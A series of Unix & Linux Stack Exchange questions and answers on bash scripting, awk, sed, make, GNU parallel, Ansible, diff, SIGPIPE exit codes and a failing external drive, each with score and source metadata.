When running a script with some lines not too important for the script to finish, how do I cancel a specific command without killing the entire script? Normally I would invoke Ctrl+C, but when I do that with this script, the entire script ends prematurely. Is there a way (e.g. options placed inside the script) to allow Ctrl+C to cancel just the command at hand? A bit of background: my ~/.bash_profile runs ssh-add as part of it, but if I cancel that, I would like the echo lines following the "error 130" of ssh-add to be shown, to remind me to run it manually before any connection.
I think you are looking for traps:

    trap terminate_foo SIGINT

    terminate_foo() {
        echo "foo terminated"
        bar
    }

    foo() {
        while :; do
            echo foo
            sleep 1
        done
    }

    bar() {
        while :; do
            echo bar
            sleep 1
        done
    }

    foo

Output:

    ./foo
    foo
    foo
    foo
    ^C foo terminated   # here ctrl+c pressed
    bar
    bar
    ...

Function foo is executed until Ctrl+C is pressed, and then execution continues, in this case with the function bar.
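Applied to the ssh-add case from the question, a minimal sketch for ~/.bash_profile might look like this (the reminder text is illustrative, and exact SIGINT handling while sourcing profiles can vary between bash versions):

    trap : INT        # keep Ctrl+C from aborting the rest of the profile
    ssh-add
    if [ $? -eq 130 ]; then
        echo "ssh-add cancelled; run it manually before connecting anywhere"
    fi
    trap - INT        # restore default Ctrl+C behaviour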
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582024", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/179000/" ] }
582,041
While tracking down an error in my shell script, I found the following behavior in this code snippet:

    declare -a filelist
    readarray filelist < <(ls -A)
    readonly filelist

    for file in "${filelist[@]}"; do
        sha256sum ${filelist[$file]} | head -c 64
    done

When the array filelist is not in double quotes, the command succeeds. I've been using ShellCheck to try to improve my coding, which recommends:

    Double quote to prevent globbing and word splitting.

I'm not worried about word splitting in this case, but in a lot of other cases I am, so I'm trying to keep my code consistent. However, when I double quote the array, the command fails. Simplifying the code to a single element gives the following:

    bash-5.0# sha256sum ${filelist[0]} | head -c 64
    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    bash-5.0# sha256sum "${filelist[0]}" | head -c 64
    sha256sum: can't open 'file1': No such file or directory

I can obviously just... not double quote, because in this instance word splitting isn't a concern. But I wanted to post because in the future it might be. My question has two parts:

1. Is there a "best-practices" way to prevent word splitting other than double quoting the array as above?
2. Where are the single quotes coming from in the array? Edit: there are no single quotes. The single quotes are the error showing the name of the file that cannot be opened.

Also, just out of curiosity, why does echo ${filelist[0]} not contain an additional newline but echo "${filelist[0]}" does?
There is absolutely no problem with quoting an array expansion. And, of course, there is no problem with not quoting it either, as long as you know and accept the consequences. Any non-quoted expansion is subject to splitting and globbing. And, in your code, the ${filelist[…]} is subject to IFS character removal (and splitting if the string contains any <space>, <tab>, or <newline>). That is what having the expansion un-quoted does: remove the trailing <newline>.

What creates this problem is that you are using readarray without removing the trailing delimiter from each array element. Doing that keeps a trailing <newline> that is reflected in the error message. What you could have used is:

    readarray -t filelist < <(ls -A)

The -t option will remove all the trailing newlines of each file name:

    -t Remove a trailing delim (default newline) from each line read.

But your code has some additional issues. There is no need to declare or empty the array filelist; that gets done by default by readarray (it needs to be done in some other cases). There is no need to parse the output of ls; in fact, that is a bad idea. The easiest way to get a list of files in an array is simply:

    filelist=( ./* )

And, to make it even better, it would be a good idea to avoid directories:

    for file in ./*; do
        [[ -f $file ]] && filelist+=( "$file" )
    done

In the loop, the value of the var $file is what should be used:

    for file in "${filelist[@]}"; do
        sha256sum "$file" | head -c 64
    done

Unless you use for file in "${!filelist[@]}"; do, which will list the keys of the array.

The whole list could be processed with just one call to sha256sum:

    sha256sum "${filelist[@]}" | cut -c -64

The improved script is:

    filelist=()                   # declare filelist as an array and empty it.

    for file in ./*; do
        if [[ -f $file ]]; then
            filelist+=( "$file" )
        fi
    done

    declare -r filelist           # declare filelist as readonly.

    sha256sum "${filelist[@]}" | cut -c -64
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582041", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408027/" ] }
582,059
I'm working with sequence data and I stupidly cannot find the correct way to replace "." by "X" in lines not starting with ">" using awk. I really need to use awk and not sed. I got this far, but this way simply all "." are replaced:

    awk '/^>/ {next} {gsub(/\./,"X")}1' Sfr.pep > Sfr2.pep

Example subdata:

    >sequence.1
    GTCAGTCAGTCA.GTCAGTCA

Result I want to get:

    >sequence.1
    GTCAGTCAGTCAXGTCAGTCA
It seems more natural to do this with sed:

    sed '/^>/!y/./X/' Sfr.pep >Sfr2.pep

This would match ^> against the current line ("does this line start with a > character?"). If that expression does not match, the y command is used to change each dot in that line to X.

Testing:

    $ cat Sfr.pep
    >sequence.1
    GTCAGTCAGTCA.GTCAGTCA

    $ sed '/^>/!y/./X/' Sfr.pep >Sfr2.pep
    $ cat Sfr2.pep
    >sequence.1
    GTCAGTCAGTCAXGTCAGTCA

The main issue with your awk code is that next is executed whenever you come across a fasta header line. This means that your code only produces sequence data, without headers. That sequence data should look ok, though, but that would not be much help. Simply negating the test and dropping the next block (or preceding the next with print) would solve it in awk for you, but, and this is my personal opinion, using the y command in sed is more elegant than using gsub() (or s///g in sed) for transliterating single characters.
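Since the question insists on awk, this is the fix the last paragraph describes, spelled out as a sketch following the answer's own suggestion:

    # Negate the test: only transliterate on non-header lines; "1" prints every line
    awk '!/^>/ { gsub(/\./, "X") } 1' Sfr.pep > Sfr2.pep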
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582059", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/403558/" ] }
582,092
I need to run several Bash scripts (the same script with different variables, to be precise) at the same time. To keep the number of tabs under control, I wish to group them in a single terminal tab. The scripts regularly output, which I check for any problem. If I send them to the background as

    ./script.sh 1 &
    ./script.sh 2 &
    ./script.sh 3 &
    ./script.sh 4

I will lose control over them. For example, I terminate the scripts with Ctrl+C. With the above code, I would have to find the pid for each process to kill them. Note that the above code is the content of my main script (say ./all_scripts.sh) rather than commands to be typed in the terminal. Is there a way to run the scripts in the same terminal while treating them as a single outputting script?
After testing different methods and programs, I found that the pragmatic solution is GNU Parallel. I post this answer as it may help others. GNU Parallel has not been built for this task, but perfectly serves the purpose. Run the scripts as:

    parallel -u ::: './script.sh 1' './script.sh 2' # (and so forth)

All scripts will be run in parallel. The -u (--ungroup) flag sends the script outputs to stdout while executing the scripts. Ctrl+C kills the parallel job, and subsequently all running scripts.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582092", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/10780/" ] }
582,157
I'm interested in a better implementation of a "reverse sign" function in Bash. I know I can do something like:

    "$(($1 * -1))"

But this produces a positive number without a sign, and I need a signed return value:

    "$((-1 * -1))" == 1 # but I need '+1'

My current version is:

    # Reverses the +/- operator for an integer argument.
    #
    # $ polarize -1   # +1
    # $ polarize +12  # -12
    # $ polarize 2-2  # 2-2
    # $ polarize - 1  # - 1
    #
    function polarize() {
        [ $# -eq 0 ] && return

        if [[ "$@" =~ ^-([[:digit:]]+)$ ]]; then
            echo -n "+${BASH_REMATCH[1]}"
        elif [[ "$@" =~ ^\+([[:digit:]]+)$ ]]; then
            echo -n "-${BASH_REMATCH[1]}"
        else
            echo -n "$@"
        fi
    }

Some notes:

- The function should handle only signed integers (i.e. -1, +22, but not 0 or 100)
- The function shouldn't return anything if there is no argument
- The function should handle multiple arguments correctly (don't do anything)
Use printf:

    printf '%+d\n' "$(( -$n ))"

The printf format string %+d means "print the given argument as a decimal integer, with a sign". So you'll get something like

    revsign () {
        if [ "$#" -eq 1 ] && [[ $1 =~ ^[+-][[:digit:]]+$ ]]; then
            printf '%+d\n' "$(( -$1 ))"
        fi
    }

This does not do anything when given multiple arguments or when given a single argument that is not a signed integer. To pass through the arguments when there are multiple of them, or when the single argument isn't an integer with a sign:

    revsign () {
        if [ "$#" -eq 1 ] && [[ $1 =~ ^[+-][[:digit:]]+$ ]]; then
            printf '%+d\n' "$(( -$1 ))"
        elif [ "$#" -gt 0 ]; then
            printf '%s\n' "$@"
        fi
    }

If you want to be careful and not accept octal numbers (written with a leading 0, as in 034) as valid integers, change the regular expression to

    ^[+-][1-9][[:digit:]]*$
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582157", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/50400/" ] }
582,288
I was looking for a way to follow "hyperlinks" in man pages, when I stumbled across the info command, which seemed to display information on commands the same as man but also allows you to tab to hyperlinks (and sadly no vim keybindings, but the arrow keys work) But it made me wonder if this command was just displaying man pages with different formatting and functionality of display...or if it was displaying something else entirely like a separate set of documentation.
man and info use different primary sources of information: man displays manpages, typically stored in /usr/share/man , while info displays Info documents, typically stored in /usr/share/info . Additionally, Info documents are normally available in a tree structure, rooted in /usr/share/info/dir , the “Directory node” displayed when you start info . Whether a given manpage contains the same information as its corresponding Info document depends on who authored both. In some cases, they’re produced from a common source, or one is produced from the other; but in many cases they’re different. GNU info will display a manpage if it doesn’t find an Info document. Pinfo can also display both Info documents and manpages, and it provides hyperlinks in manpages; its key bindings can also be configured to match your tastes.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582288", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/3570/" ] }
582,344
From inside an AWK script, I can pass variables as arguments to external utilities:

    awk 'BEGIN {
        filename = "path_to_file_without_space"
        "file " filename | getline
        print $0
    }'

But if the variable contains spaces,

    awk 'BEGIN {
        filename = "path to file with spaces"
        "file " filename | getline
        print $0
    }'

I get the error

    file: cannot open `path' (No such file or directory)

suggesting that the argument is split on whitespace, much the same way that a shell splits unquoted variables on whitespace. I thought of disabling shell field splitting by setting the shell's IFS to null, like so:

    "IFS= file " filename | getline

or by setting IFS to null before running the AWK command, but neither option makes any difference. How can I avoid this field splitting?
You will have to quote the name of the file:

    awk 'BEGIN {
        filename = "path to file with spaces"
        "file \"" filename "\"" | getline
        print
    }'

or, as suggested in comments, for ease of reading,

    awk 'BEGIN {
        DQ = "\042" # double quote (ASCII octal 42)
        filename = "path to file with spaces"
        "file " DQ filename DQ | getline
        print
    }'

or, assuming this is part of a larger awk program,

    BEGIN {
        SQ = "\047"
        DQ = "\042"
    }

    BEGIN {
        name = "filename with spaces"

        cmd = sprintf("file %s%s%s", DQ, name, DQ)
        cmd | getline
        close(cmd)

        print
    }

That is, close the command when done with it to save on open file handles. Set up convenience "constants" in a separate BEGIN block (these blocks are executed in order). Create the command using sprintf into a separate variable. (Most of these things are obviously for longer or more complicated awk programs that need to present a readable structure to be maintainable; one could also imagine writing dquote() and squote() functions that quote strings.)

The left-hand side of the "pipe" will evaluate to the literal string

    file "path to file with spaces"

Basically, using cmd | getline makes awk call sh -c with a single argument, which is the string cmd. That string therefore must be properly quoted for executing with sh -c. The technical details are found in the POSIX standard:

    expression | getline [var]

    Read a record of input from a stream piped from the output of a command. The stream shall be created if no stream is currently open with the value of expression as its command name. The stream created shall be equivalent to one created by a call to the popen() function with the value of expression as the command argument and a value of r as the mode argument. As long as the stream remains open, subsequent calls in which expression evaluates to the same string value shall read subsequent records from the stream. The stream shall remain open until the close function is called with an expression that evaluates to the same string value. At that time, the stream shall be closed as if by a call to the pclose() function. If var is omitted, $0 and NF shall be set; otherwise, var shall be set and, if appropriate, it shall be considered a numeric string (see Expressions in awk).

The popen() function referred to here is the C popen() library function. This arranges for the given string to be executed by sh -c. You'll have exactly the same issue with system() if executing a command using a filename with spaces, but in that case the C library's system() function is called, which also calls sh -c in a similar way as popen() (but with different plumbing of I/O streams).

So, no amount of setting IFS to anything would help if sh -c was invoked with the single argument

    file path to file with spaces
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582344", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
582,347
I have the script below, and I noticed that the for loop is executing in an order other than the one I specified, i.e. I expected 2018, 2019, 2020 but it comes out as 2019, 2018, 2020. Is there a specific reason for that in shell scripting? Is there any way to preserve the order?

    #!/bin/sh
    declare -A arr
    arr=( ["2018"]=5%12 ["2019"]=1%12 ["2020"]=1%2 )

    INPUT_MONTH=$2
    INPUT_YEAR=$1

    # For loop to iterate the year (key) values of the array
    for year in ${!arr[@]}; do
        echo ${year} ${arr[${year}]}
        MONTH_RANGE=${arr[${year}]}
        if [ ${year} -ge ${INPUT_YEAR} ]; then
            START_MONTH=$(echo "${MONTH_RANGE}" | cut -d'%' -f 1)
            END_MONTH=$(echo "${MONTH_RANGE}" | cut -d'%' -f 2)
            # input year is equal and input month is different from default start one.
            if [ "${year}" == "${INPUT_YEAR}" ]; then
                START_MONTH=$INPUT_MONTH
            fi
            for mon in $(seq $START_MONTH $END_MONTH); do
                echo "Process year:month <=> ${year}:${mon}"
            done
        else
            continue
        fi
    done

Output:

    2019 1%12
    Process year:month <=> 2019:1
    Process year:month <=> 2019:2
    Process year:month <=> 2019:3
    Process year:month <=> 2019:4
    Process year:month <=> 2019:5
    Process year:month <=> 2019:6
    Process year:month <=> 2019:7
    Process year:month <=> 2019:8
    Process year:month <=> 2019:9
    Process year:month <=> 2019:10
    Process year:month <=> 2019:11
    Process year:month <=> 2019:12
    2018 5%12
    Process year:month <=> 2018:4
    Process year:month <=> 2018:5
    Process year:month <=> 2018:6
    Process year:month <=> 2018:7
    Process year:month <=> 2018:8
    Process year:month <=> 2018:9
    Process year:month <=> 2018:10
    Process year:month <=> 2018:11
    Process year:month <=> 2018:12
    2020 1%2
    Process year:month <=> 2020:1
    Process year:month <=> 2020:2
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582347", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/336214/" ] }
582,437
In my make file I have a target test:, and make test works fine. But when I also have a subdir called test, I get the message:

    make: 'test' is up to date.

How can I force make to ignore the subdir and do the target?
Declare it as phony. This is supported by GNU make and BSD make.

    .PHONY: test
    test: build
        test/run_them_all
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582437", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378139/" ] }
582,463
How do you relocate bash runtime files (~/.bash_history, ~/.bashrc, etc.) to a defined directory (such as ~/.config/bash, ~/.cache/bashhistory, etc.)?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582463", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408670/" ] }
582,567
I need to write a shell script which can execute all .sh files matching a directory pattern, if they exist. Something like:

    #!/bin/bash
    sh /var/scripts/*/my_*.inc.sh

But the above script executes only one file: the first file that matches (it seems to be chosen by the latest modification date), which is not my point. I need all files matching the rule to be executed.
The reason that your code does not work is because of what happens when a filename globbing pattern expands. The pattern would expand to a list of matching pathnames. The code in your script would call sh with this list. This means it would execute the first matching name as the script and give the other names as arguments to that script:

    sh /var/scripts/dir/my_first.inc.sh /var/scripts/dir/my_second.inc.sh /var/scripts/dir/my_third.inc.sh

Instead, just iterate over the matching names:

    #!/bin/sh

    for name in /var/scripts/*/my_*.inc.sh; do
        sh "$name"
    done

This assumes that each of the matching names is a script that should be executed by sh (not bash). If the individual files are executable and have a proper #!-line, then remove the sh from the invocation of the script in the loop above. If the files are "dot scripts", i.e. scripts that should be sourced, then replace sh by . instead to have the scripts execute in the current script's environment.

Note that the script above can be an sh script (#!/bin/sh) as it does not use any bash features. If the other scripts are "dot scripts", then you may obviously have to change this to #!/bin/bash or whatever other interpreter is needed to source the scripts.
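One caveat worth adding as a hedged note (my addition, not part of the answer above): if nothing matches, the shell passes the literal pattern through, so sh would be invoked on a non-existent name. A small guard avoids that:

    for name in /var/scripts/*/my_*.inc.sh; do
        [ -e "$name" ] || continue   # pattern did not match anything
        sh "$name"
    done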
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582567", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/223233/" ] }
582,606
Every now and then I need to reinstall a Linux system (mainly Ubuntu-based distros). The process of reinstalling every piece of software I need is really boring and time-consuming. Is there any software that can help me out? For Windows there is Ninite; is there something similar for Linux? Edit: Thanks for all the answers! I went with Ansible and it is an amazing tool.
Ansible is an open-source software provisioning, configuration management, and application-deployment tool. It runs on many Unix-like systems, and can configure both Unix-like systems as well as Microsoft Windows. It includes its own declarative language to describe system configuration (from Wikipedia ). Homepage (Github) . There are several others in the same category; reading about Ansible should give you the vocabulary to search for the others and compare, if needed. Nix is a newer contender; some say "more complex, but maybe just right". chef is also on the scene.

Ansible example for hostname myhost , module apt (replace with yum or whatever):

ansible -K -i myhost, -m apt -a "name=tcpdump,tmux state=present" --become myhost

The list "tcpdump,tmux" can be extended with commas. (The hostname myhost appears twice in the command line because we are not using a fixed host inventory list, but an ad-hoc one, with the trailing comma.) This only scratches the surface; Ansible has an extensive module collection .
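For anything beyond one-off commands, the same install can live in a playbook so it is repeatable after every reinstall. A minimal sketch (the file name and package list are just examples):

# packages.yml
- hosts: all
  become: true
  tasks:
    - name: install my usual tools
      apt:
        name:
          - tcpdump
          - tmux
        state: present

Run it with something like: ansible-playbook -K -i myhost, packages.yml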
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582606", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408815/" ] }
582,693
How do I get the first digit from a number? For example, 25 - to get only the "2" from the 25. This is what I tried:

echo -n "Enter age: "
read age
echo $(s:0:1)
You're using the wrong variable s instead of age , and parameter expansion works with curly braces ${...} :

read -p "Enter age: " age
echo "${age:0:1}"
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582693", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408468/" ] }
582,701
I looked at other similar questions but the answers did not help me. I am new to bash and probably have a syntax error in my script but I can't figure out where. I was trying to update users in the example.conf file every time this script is run. Each user has a name.pub file.

VAR1=$( ls | grep ".pub" | sed "s/.pub//g")
VAR2="@demo_project_users = "
res=$VAR2$VAR1
sed "s/@demo_project_users = .*/$res/g" example.conf

This is producing the Unterminated 's' command error. Edit: I have these files in a folder

aaaaaaaaaa.pub  eboh.pub      get_usernames.sh  mmusterfrau.pub  plom.pub   rrein.pub  update_users.sh
dboh.pub        example.conf  leni.pub          mmustermann.pub  rcall.pub  tani.pub

and I want to get all user names (without .pub) in one row with a space in between, like this: @demo_project_users = (... all names here)
Your grep is likely matching more than one filename, which gives a value in $res that contains newlines. GNU sed would complain exactly the way that you describe when using a replacement string that contains literal newlines. Don't use grep to filter the output of ls . If you want to get all names in the current directory matching the pattern *.pub , use

filenames=( *.pub )

This would create an array containing all names that match the given pattern. Then:

sed 's/\(@demo_project_users = \).*/\1'"${filenames[*]%.pub}"'/g' example.conf

The "${filenames[*]%.pub}" expansion will expand to a single string consisting of each of the filenames in the filenames array, delimited by spaces (or whatever the first character of $IFS happens to be; a space by default), and with the suffix string .pub removed from each one. It's the "${filenames[*]}" bit that expands to the space-delimited string, and it's the %.pub bit that removes the .pub suffix from each filename.
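A quick way to convince yourself of what that expansion produces (the names here are made up):

filenames=( alice.pub bob.pub carol.pub )
printf '%s\n' "${filenames[*]%.pub}"
# prints: alice bob carol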
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582701", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408908/" ] }
582,738
I'm attempting to start with a file in the following form:

00: 42 ; byte 0 is 0x42 / d
01: 52 ; byte 1 is 0x52 / r
02: 62 ; byte 2 is 0x62 / D
03: 72 ; byte 3 is 0x72 / R
07: 1f ; bytes 03..0e are implicitly 00, byte 0f is 0x1f

and use it to generate an 8-byte file whose values (in hex form) would be:

42 52 62 72 00 00 00 1f

The exact input format isn't carved in stone. I just picked ';' as a comment delimiter because it's a single character and unambiguous. The form of the offset: and 2-digit hex value just seemed obvious based on tradition. I suspect the ultimate solution involves using sed or awk to strip away the comment, then piping their output to xxd , but so far my first experiment has fallen flat on its face & I can't even get xxd to parse what ought to be a best-case simple text file. For my first attempt, I simplified config.src:

00: 42
01: 52
02: 62
03: 72

(omitting the comments and implied zero-bytes for now, and sticking to values corresponding to printable ASCII) ... then tried to generate the binary file from it:

xxd -r config.src config.bin

What I expected to see from cat config.bin and xxd config.bin :

BRbr

and

00000000: 42 52 62 72                     BRbr

What I ended up with: a 2-byte file with unprintable content cat can't render, and the following output from xxd config.bin :

00000000: 0301

So... problem #1... What am I doing wrong with xxd , and how can I fix it (or is there a better approach)? Keep in mind that I really want to specify one byte value per line, and would really like to be able to automatically skip sequential values and have them automatically filled with zeroes. Then... problem #2... once I get xxd to parse my file, how can I add the comments and strip them away before xxd sees them? Note that I'm not hellbent on using xxd per se... but this is a shared web server to which I don't have root or admin access, so apt-get install isn't an option, and compiling my own copies from source wouldn't necessarily be easy. (Background info... not necessarily essential to solving the problem, but adding context to why I'm trying to do it.) I'm working on an Arduino-based IoT controller. For the past few weeks, its configuration has consisted of hardcoded values and various interpretations of a DIP switch I've repurposed every few days. It's getting tedious. I'm not in the mood yet to implement a proper UI, so I came up with the idea of having it just fetch a binary config blob from my web server into a char[] as its first act upon starting up (enabling me to tweak runtime config values without having to go all the way and reflash the board itself, which is honestly kind of a pain at this point).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582738", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/37564/" ] }
582,772
I wanted to print the fields in the line which is delimited by |~^ . I tried many ways, but am unable to print the fields using awk . Below is the file content for reference. Input:

H|~^20200425|~^abcd|~^sum
R|~^abc|~^2019-03-05|~^10.00
R|~^abc|~^2019-03-05|~^20.00
R|~^abc|~^2019-03-05|~^30.00
R|~^abc|~^2019-03-06|~^100.00
R|~^abc|~^2019-03-06|~^15.00
R|~^abc|~^2019-03-06|~^10.00
T|~^20200425|~^6|~^185.00

I need to separate the fields based on the |~^ delimiter using awk . I tried

cat input | grep "^T" | awk -F '|~^' '{print $2}'

but it's returning null. Any suggestions?
I think the problem you are facing is related to the following statement in the (GNU) awk manpage [1]:

If FS is a single character, fields are separated by that character. If FS is the null string, then each individual character becomes a separate field. Otherwise, FS is expected to be a full regular expression.

Since your field delimiting pattern contains characters that have a special meaning in regular expressions (the | and the ^ ), you need to escape them properly. Because of the way awk interprets variables (string literals are parsed twice ), you would need to specify that using double backslashes, as in

awk -F '\\|~\\^' '{print $2}' input.txt

Resulting output for your example:

20200425
abc
abc
abc
abc
abc
abc
20200425

To consider only those lines starting with T , use

awk -F '\\|~\\^' '/^T/ {print $2}' input.txt

or alternatively, by selecting only lines where a certain field (here, the first field) has a value of T :

awk -F '\\|~\\^' '$1=="T" {print $2}' input.txt

Result for your example in both cases:

20200425

Notice that in general, the combined use of awk , grep and sed is rarely necessary. Furthermore, all these tools can directly access files, so using cat to feed them the text to process is also unnecessary. [1]: As an (unrelated) side note: The part with the "null string" does not work on all Awk variants. The GNU Awk manual states "This is a common extension; it is not specified by the POSIX standard".
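If remembering the double-backslash rule is a nuisance, one alternative sketch is to rewrite the separator inside the program, where a regex constant needs only single backslashes; assigning to $0 via gsub() re-splits the record using the default whitespace FS :

awk '/^T/ { gsub(/\|~\^/, " "); print $2 }' input.txt
# prints: 20200425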
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582772", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/400540/" ] }
582,774
I have a representative dataset:

35.5259 327
35.526 326
35.526 325
35.5261 324
35.5262 323
35.5263 322
35.5264 321
35.5265 320
35.5266 319
35.5268 318
# Contour 4, label:
35.5269 317
35.527 316
35.5272 315
35.5274 314
35.5276 313
35.5278 312
35.528 311
# Contour 4, label:
35.5282 310
35.5285 309
35.5287 308
35.529 307
35.5293 306

I try to find the two max values within a range in col 2 with:

awk '320>$2,$2>315 && $1>max1{max1=$1;line=$2} 313>$2,$2>307 && $1>max2{max2=$1;line2=$2} END {printf " %s\t %s\t %s\t %s\n",max1,line,max2,line2}' FILENAME

I just get blank output (as I have lots of blank spaces in the txt file). How do I ignore those? With $1+0 == $1 ? I would like to find the max values in col 1 between 320 and 315 and between 313 and 307 in col 2. The output I need:

35.5266 319
35.5278 312

How do I get the desired output? Thanks
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582774", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/293538/" ] }
582,796
According to https://www.computerhope.com/unix/udiff.htm

The diff command analyzes two files and prints the lines that are different.

Can I use the same diff command to compare two strings?

$ more file*
::::::::::::::
file1.txt
::::::::::::::
hey
::::::::::::::
file2.txt
::::::::::::::
hi

$ diff file1.txt file2.txt
1c1
< hey
---
> hi

Instead of saving the content of hey and hi into two different files, can I read it directly? By the way, there are no files named hey or hi in the example below, which is why I get No such file or directory error messages.

$ diff hey hi
diff: hey: No such file or directory
diff: hi: No such file or directory
Yes, you can use diff on two strings, if you make files from them, because diff will only ever compare files. A shortcut way to do that is using process substitutions in a shell that supports these:

diff <( printf '%s\n' "$string1" ) <( printf '%s\n' "$string2" )

Example:

$ diff <( printf '%s\n' "hey" ) <( printf '%s\n' "hi" )
1c1
< hey
---
> hi

In other shells,

printf '%s\n' "$string1" >tmpfile
printf '%s\n' "$string2" | diff tmpfile -
rm -f tmpfile

In this second example, one file contains the first string, while the second string is given to diff on standard input. diff is invoked with the file containing the first string as its first argument. As its second argument, - signals that it should read standard input (on which the second string will arrive via printf ).
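In bash (and zsh/ksh93) you can also avoid the second process substitution with a here-string; a small sketch:

diff <( printf '%s\n' "$string1" ) - <<<"$string2"

Here <<< feeds $string2 (plus a trailing newline) to diff's standard input, so it pairs naturally with the - argument shown above.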
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582796", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409008/" ] }
582,844
I'm trying to execute the following code:

set -euxo pipefail
yes phrase | make installer

where the Makefile uses phrase from stdin to create an installer file. However, this command ends in error code 141, which breaks my CI build. This example can be simplified to:

yes | tee >(echo yo)

From what I see here: Pipe Fail (141) when piping output into tee -- why? - this error means that the pipe consumer just stopped consuming output - which is perfectly fine in my case. Is there a way to suppress the pipe error, and just get the return code from make installer ?
A 141 exit code indicates that the process failed with SIGPIPE ; this happens to yes when the pipe closes. To mask this for your CI, you need to mask the error using something like

(yes phrase ||:) | make installer

This will run yes phrase , and if it fails, run : which exits with code 0. This is safe enough since yes doesn't have much cause to fail apart from being unable to write. To debug pipe issues such as these, the best approach is to look at PIPESTATUS :

yes phrase | make installer || echo "${PIPESTATUS[@]}"

This will show the exit codes for all parts of the pipe on failure. Those which fail with exit code 141 can then be handled appropriately. The generic handling pattern for a specific error code is

(command; ec=$?; if [ "$ec" -eq 141 ]; then exit 0; else exit "$ec"; fi)

(thanks Hauke Laging ); this runs command , and exits with code 0 if command succeeds or if it exits with code 141. Other exit codes are reflected as-is.
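If this pattern comes up often, the generic handling can be wrapped in a small helper; an untested sketch (the function name is made up):

allow_sigpipe() {
	"$@"
	ec=$?
	if [ "$ec" -eq 141 ]; then
		return 0	# treat SIGPIPE as success
	fi
	return "$ec"
}

allow_sigpipe yes phrase | make installer

Under set -o pipefail the pipeline's status then reflects make installer alone, which is what the CI should be judging anyway.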
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582844", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/184021/" ] }
582,949
A relative asked me to look at a Seagate 2TB external hard drive of theirs that they said used to work and no longer does. I popped it into my desktop and nothing happened for a while other than it showing up (with an appropriate name) in lsusb . After about 10 minutes I used ls /dev | grep sd and saw that it finally came up as /dev/sdc, so I tried to view it in fdisk -l , but it was not listed. I figured maybe it was a GPT table so I opened it in GParted, but it was taking forever to load so I tried lsblk where I got this:

NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
sda      8:0    0 111.8G  0 disk
├─sda1   8:1    0   108G  0 part /
├─sda2   8:2    0     1K  0 part
└─sda5   8:5    0   3.8G  0 part [SWAP]
sdb      8:16   0   1.8T  0 disk
└─sdb1   8:17   0   1.8T  0 part
sdc      8:32   0   128P  0 disk
sr0     11:0    1  1024M  0 rom

Now either my relative is somehow in possession of the largest drive known to man, or something VERY strange has occurred. Assuming the latter, is there any way I could go about fixing this issue? A little extra note: I tried opening the drive with GParted again, this time waiting for it to load, and it too believed the drive to contain 128 PB of unallocated space, so this is something internal. Also, clearly there are no partitions detected, and I already told my relative there is likely nothing that can be done about the data on it, which they said they didn't care about anyway; they just want the drive to be usable again. I tried rewriting the MBR using dd which failed, and so I got the following relevant messages from dmesg :

[15404.910434] scsi_io_completion_action: 14 callbacks suppressed
[15404.910445] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.910449] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.910453] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.910457] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.910458] print_req_error: 14 callbacks suppressed
[15404.910461] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.914427] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.914430] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.914432] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.914435] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.914437] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.914440] buffer_io_error: 38 callbacks suppressed
[15404.914442] Buffer I/O error on dev sdc, logical block 0, async page read
[15404.915937] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.915941] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
